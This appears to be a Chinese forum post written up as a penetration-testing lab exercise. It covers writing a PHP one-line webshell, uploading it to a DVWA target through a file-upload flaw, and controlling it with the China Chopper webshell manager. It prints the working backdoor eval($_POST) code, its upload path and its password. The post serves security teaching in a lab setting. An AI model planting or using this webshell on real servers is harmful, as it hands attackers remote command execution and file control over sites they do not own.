本帖最后由 赵庆煜 于 2024-4-18 09:01 编辑
一、实验目的 熟悉PHP一句话木马的编写及Webshell管理工具“中国菜刀”的配置使用。 二、实验环境 操作机:Pentest-Atk Windows 10 靶机:A-SQLi-Labs 三、实验原理 (1)关于Webshell Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。 Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 (2)关于中国菜刀 中国菜刀是一款专业的Webshell管理软件,用途广泛,使用方便,小巧实用,只要支持动态脚本的网站,都可以用中国菜刀来进行管理。 四、实验步骤 1.编写PHP一句话木马(Webshell) 在操作机Pentest-Atk桌面新建一个文本文档并更名为muma.php: 鼠标右键单击muma.php,在弹出的菜单中选择“Edit with Notepad++”: 用Notepad++打开此文件后,在文件中输入以下代码并保存: <?php @eval($_POST['123456']); ?> 2.利用靶机的文件上传漏洞,将此木马文件(Webshell)上传至靶机 (1)在操作机Pentest-Atk上启动浏览器,在地址栏中输入以下URL访问靶机上的DVWA网站: http://[靶机IP]/dvwa/ (注意大小写) (2)成功登录DVWA网站后,在网站主页左侧菜单选择DVWA Security,将网站的安全级别设置为“Low”: (3)在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径: 3.利用“中国菜刀”连接靶机上的muma.php (1)在操作机Pentest-Atk上运行“中国菜刀”: (2)在“中国菜刀”主界面空白处单击鼠标右键,在弹出的菜单中选择“添加”, 添加一条Webshell管理项: 地址:http://[靶机IP]/dvwa/hackable/uploads/muma.php 连接密码:123456 添加完成后,会看到主界面多了一条Webshell管理项: 4.利用“中国菜刀”对靶机进行虚拟终端及文件操作 (1)虚拟终端操作 选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“虚拟终端” 打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(如whoami、netstat -an等): (2)文件操作 选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“文件管理”: 打开文件管理界面后,可以像操作本地机器一样,对靶机系统进行一些操作(如上传文件、下载文件、修改文件属性等): 五、实验总结 本次实验,熟悉了PHP一句话木马的编写及“中国菜刀”的配置使用。 |